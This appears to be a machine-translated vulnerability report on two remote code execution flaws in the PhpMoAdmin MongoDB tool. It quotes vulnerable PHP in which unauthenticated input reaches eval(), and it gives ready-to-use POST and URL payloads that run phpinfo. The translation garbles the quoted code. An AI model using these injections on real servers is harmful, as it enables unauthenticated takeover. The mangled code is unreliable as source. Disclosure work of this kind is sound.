PhpMoAdmin Vulnerability Analysis Report

PhpMoAdmin Vulnerability Analysis Report

PhpMoAdmin is a convenient online MongoDB management tool that can be used to create, delete, and modify databases and indexes. It provides view and data search tools and statistics on the database startup time and memory, php applications that support importing and exporting JSON data.

Recently, a hacker named sp1nlock announced an arbitrary code execution vulnerability in phpmoadmin, which may cause intrusion of users using the management program.

After a simple analysis by a researcher at the Alibaba defense lab, another similar Remote Code Execution Vulnerability (0day) was found in this application ).

0x01 public Vulnerability Analysis

The vulnerability file moadmin. php has no logon authentication permission.

Public function _ construct (){.... Omit several rows... $ Action = (isset ($ _ GET ['action'])? $ _ GET ['action']: 'listcollections '); if (isset ($ _ POST ['object']) {// pass in if (self :: $ model-> saveObject ($ _ GET ['collection'], $ _ POST ['object']) // pass in the saveObject function, cause code vulnerability {return $ this-> _ dumpFormVals (); saveObject function: public function saveObject ($ collection, $ obj) {eval ('$ obj = '. $ obj. ';'); // The $ obj parameter is controllable. Input Eval and execute return $ this-> mongo-> selectCollection ($ collection)-> save ($ obj );}

0x02 Exploitation

Pass object = 1 through post; phpinfo ();

0x03 0-day analysis

This program has another arbitrary code execution vulnerability, Location: 552-557 lines listRows Function

Public function listRows ($ collection) {foreach ($ this-> sort as $ key => $ val) {// cast vals to int $ sort [$ key] = (int) $ val;} $ col = $ this-> mongo-> selectCollection ($ collection); $ find = array (); if (isset ($ _ GET ['Find ']) & $ _ GET ['Find ']) {// use the get method to input the find variable $ _ GET ['Find '] = trim ($ _ GET ['Find']); if (strpos ($ _ GET ['Find '], 'array') = 0) {// $ find: simply determines whether the variable starts with array, if it is true, the vulnerability location eval ('$ find = '. $ _ GET ['Find ']. ';'); // input eval to execute arbitrary code} else if (is_string ($ _ GET ['Find ']) {if ($ findArr = json_decode ($ _ GET ['Find '], true) {$ find = $ findArr ;}}}

0x04 0-day exploitation

If there is no nutrition, you can search for two eval series and write them directly. http: // ip/moadmin. php? Collection = secpulse & action = listRows & find = array (); phpinfo (); exit;